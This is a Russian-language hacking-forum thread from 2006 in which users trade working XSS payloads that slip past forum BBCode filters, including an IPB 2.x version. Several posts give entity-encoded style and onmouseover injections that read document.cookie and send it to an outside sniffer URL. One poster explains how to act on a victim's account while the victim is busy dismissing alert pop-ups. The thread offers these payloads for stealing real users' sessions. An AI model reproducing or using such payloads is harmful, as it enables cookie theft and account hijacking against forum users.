Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
06.01.2006, 00:29
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810
Репутация:
10
|
|
Там много квадратных скобок.. убрал после первой, перед Email, и после второй, перед Url, но всеравно не работает  |
|
|
06.01.2006, 00:51
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Что значит не работает ?? Какой результирующий HTML ?
В слове javascrp t - перед t - табуляция.
|
|
|
|
06.01.2006, 00:55
|
|
Познающий
Регистрация: 13.10.2005
Сообщений: 78
Провел на форуме:
507855
Репутация:
30
|
|
Vrode tyt esche probel nado ubrat "ew ]" esli ya ne oshibaus.
|
|
|
|
06.01.2006, 00:56
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810
Репутация:
10
|
|
mailto:assss@wew.ew ]
sssssssssssssssssssssssssss[/URL]` style=`background:url(javascript :alert(/Hi_from_Algol/))`
Вот так выводит и все |
|
|
|
06.01.2006, 01:04
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Сообщение от FoGorm
Вот так выводит и все Ну значит не судьба 
|
|
|
|
06.01.2006, 01:06
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Кстати еще должен быть пассивыный XSS в теме письма:
Код:
Тема ПМ<script>alert()</script>
Если они это не пофиксили еще... |
|
|
|
06.01.2006, 01:55
|
|
Banned
Регистрация: 04.01.2006
Сообщений: 10
Провел на форуме:
24702
Репутация:
2
|
|
Сообщение от FoGorm
mailto:assss@wew.ew ]
sssssssssssssssssssssssssss[/URL]` style=`background:url(javascript :alert(/Hi_from_Algol/))`
Вот так выводит и все Это потому что Алгол дал тебе для версии 3.0.3
После версии 3.0.6, фильтры очень сильно изменились.
Код HTML:
[URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/FONT][/url][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ][/FONT][/URL]
В атрибутах style, в параметрах, (То что идет после знака равенства) убери плюсики ( +).
Эту строку
не трогай.
А вообще пора бы этот код сделать чтобы работал для всех браузеров. Я как приду, напишу тебе чтобы работало не только в ИЕ, но и в Опере и в Фаерфокс.
|
|
|
|
08.01.2006, 05:25
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810
Репутация:
10
|
|
Отлично... просто класс, все действительно работает! Очень благодарен, спасибо большое!!! Если можешь - напиши чтобы работало и в остальных браузерах, буду ждать! Еще раз огромное спасибо!
|
|
|
|
08.01.2006, 20:53
|
|
Banned
Регистрация: 06.01.2006
Сообщений: 4
Провел на форуме:
19148
Репутация:
0
|
|
style=background:url('javascript:alert(/wj/)');
Сделай так, чтобы работало не только в ИЕ, но и в Опера и Фаерфокс. Но так как в ФФ есть авто-защита, то напиши вот так:
style=position:absolute;top:0px;left:0x;width:100% ;height:100%; onmouseover=alert(/wj/);pic=new Image();pic.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
Этот код с паливой, но будет работать и в Фаефокс. Потому что код с паливой, пришлось жертве дать бесчисленное количество алертов. Куки придут на античатовский сниффер, а пока жертва опомнится, у тебя есть несколько секунд делать то, что ты хочешь. В зависимости от знаний твоей жертвы.
Все параметры тоже закодируй.
Последний раз редактировалось Horse; 08.01.2006 в 20:56..
|
|
|
|
08.01.2006, 22:53
|
|
Banned
Регистрация: 06.01.2006
Сообщений: 4
Провел на форуме:
19148
Репутация:
0
|
|
Кстати, тем кому надо чтобы можно было воровать куки в Фаерфоксе на форумах IPB от 2.* до 2.1.3, то вот вам код:
[post=1000[topic=target style=position:absolute;top:0px;left:0x;width:100% ;height:100%; onmouseover=alert(/wj/);pic=new Image();pic.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie; wj ]Happy New Year![/topic]]enjoy[/post]
Параметры тут тоже закодируйте.
В версии 2.1.4 теги пост и топик уже пропаченны из-за того, что один человечек на меня настукал компании Инвизион, но как всегда, есть и другие теги, так что не беда. 
Последний раз редактировалось Егорыч+++; 08.01.2006 в 23:03..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
